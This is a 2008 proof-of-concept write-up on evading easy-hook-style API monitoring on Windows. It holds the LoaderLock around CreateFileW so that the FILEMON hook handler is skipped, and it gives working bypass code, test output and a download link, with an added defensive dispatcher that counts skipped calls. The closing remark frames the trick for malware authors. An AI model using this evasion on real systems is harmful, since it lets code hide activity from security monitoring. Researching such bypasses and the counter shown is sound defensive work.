
Created: Sunday, December 14 2008 18:52.37 CST  
Bypassing Windows hook engines that do not execute the hook handler if the LoaderLock is held
Author: Dreg # Views: 3188

This project bypasses Windows hook engines that do not execute the hook handler if the LoaderLock is held.

It includes a bypass of the easy-hook FILEMON example.

This POC tries to create two files with CreateFileW:
- no_bypass_hook.txt: which is logged by the easy-hook FILEMON
- bypass_hook.txt: which bypasses the easy-hook FILEMON

- The bypass method is to hold the LoaderLock around the call:
  -. RtlEnterCriticalSection( NtCurrentTeb()->Peb->LoaderLock );
  -. CreateFile( ByPassFile.txt );
  -. RtlLeaveCriticalSection( NtCurrentTeb()->Peb->LoaderLock );
- This works because the easy-hook TDB calls the Auxiliary Windows Library
   before invoking the hook handler: if AuxUlibIsDLLSynchronizationHeld
   returns TRUE, easy-hook does not execute the hook handler.
- While the LoaderLock is held, AuxUlibIsDLLSynchronizationHeld always returns TRUE.

The code to bypass the easy-hook FILEMON hook handler is very simple:


/* RtlEnterCriticalSection, RtlLeaveCriticalSection and NtCurrentTeb() come from ntdll;
   FILE_BYPASS_HOOK is the project's name for the bypass_hook.txt path. */
RtlEnterCriticalSection( NtCurrentTeb()->Peb->LoaderLock );   /* AuxUlibIsDLLSynchronizationHeld now returns TRUE */
HANDLE h = CreateFileW
(
    FILE_BYPASS_HOOK,
    0,                       /* no read/write access requested */
    0,
    NULL,
    OPEN_EXISTING,
    FILE_ATTRIBUTE_NORMAL,
    NULL
);
RtlLeaveCriticalSection( NtCurrentTeb()->Peb->LoaderLock );   /* release as soon as possible; see the deadlock note below */
if ( h != INVALID_HANDLE_VALUE )
    CloseHandle( h );        /* the original snippet leaked the handle */


FILE_BYPASS_HOOK then never shows up in the easy-hook FILEMON log.
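What a hook engine that takes the same safety shortcut could do so that the skip is not silent, as an added example (not easy-hook's code and not part of this project): the dispatcher still refuses to run the handler while the loader lock is held, but counts the skipped call with a lock-free increment, so a monitor can see that calls were made under the LoaderLock. The AuxUlibIsDLLSynchronizationHeld query and InterlockedIncrement are the Windows path; off Windows the lock state is a constructed stand-in (`g_fake_lock_held`), and `filemon_handler` is a constructed minimal handler.

```c
#include <wchar.h>

#ifdef _WIN32
#include <windows.h>
#include <aux_ulib.h>                     /* link with aux_ulib.lib */
/* The query easy-hook makes before dispatching; assumes AuxUlibInitialize() ran at load. */
static int loader_lock_held(void) {
    BOOL held = FALSE;
    return AuxUlibIsDLLSynchronizationHeld(&held) && held;
}
#define ATOMIC_INC(p) InterlockedIncrement(p)
#else
/* Off Windows the loader-lock state is simulated so the dispatch logic stays testable. */
static int g_fake_lock_held = 0;
static int loader_lock_held(void) { return g_fake_lock_held; }
#define ATOMIC_INC(p) __sync_fetch_and_add((p), 1)
#endif
typedef void (*hook_handler_t)(const wchar_t *path);

/* Lock-free counters: the skip path may run inside DllMain, so no heap and no locks. */
static volatile long g_delivered = 0, g_skipped = 0;
long delivered_calls(void) { return g_delivered; }
long skipped_calls(void)   { return g_skipped; }
/* Returns 1 if the handler ran, 0 if the call was skipped because the loader lock was
 * held. The skip is counted rather than silent, so a rising skipped_calls() is the
 * visible trace of CreateFile calls made while the LoaderLock is held. */
int dispatch_create_file(hook_handler_t handler, const wchar_t *path)
{
    if (loader_lock_held()) { ATOMIC_INC(&g_skipped); return 0; }
    ATOMIC_INC(&g_delivered);
    handler(path);
    return 1;
}

/* Minimal FileMon-style handler (constructed): remembers the last path it was shown. */
static wchar_t g_last_path[64] = L"";
void filemon_handler(const wchar_t *path) { wcsncpy(g_last_path, path, 63); g_last_path[63] = L'\0'; }
const wchar_t *last_logged_path(void) { return g_last_path; }
int main(void)
{
    dispatch_create_file(filemon_handler, L"no_bypass_hook.txt");
#ifndef _WIN32
    g_fake_lock_held = 1;                 /* stands in for RtlEnterCriticalSection(LoaderLock) */
    dispatch_create_file(filemon_handler, L"bypass_hook.txt");
    g_fake_lock_held = 0;
#endif
    wprintf(L"logged=%ls delivered=%ld skipped=%ld\n", last_logged_path(), delivered_calls(), skipped_calls());
    return 0;
}
```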

Testing the code is very simple: just run bypass_easyhook.exe, which creates the two files every two seconds:


0-
CreateFileW(bypass_hook.txt) <- This CALL BYPASS easy-hook

CreateFileW(no_bypass_hook.txt) <- This CALL NOT BYPASS easy-hook
...


Next, run the FILEMON with the PID of bypass_easyhook.exe.

(Run FileMon from the FILEMON directory):

C:\bypass_easyhook\Release>FileMon.exe 2628
...

Number of assemblies processed = 3
Number of assemblies installed = 3
Number of failures = 0

FileMon has been installed in target 2628.

[2628:2772]: "no_bypass_hook.txt"
[2628:2772]: "no_bypass_hook.txt"

Only no_bypass_hook.txt is logged; FILEMON never logged the CreateFileW of bypass_hook.txt :-).

Bypassing Windows hook engines that do not execute the hook handler if the LoaderLock is held is very simple with this trick.

But if you want to code a serious malware or program, hold the LoaderLock only in safe situations. It is very important to avoid deadlocks: while you hold it, every other thread that tries to load or unload a DLL, or to start or exit (which runs DllMain), blocks until you release it.

The project: http://www.fr33project.org/projects/bypass_easyhook.rar
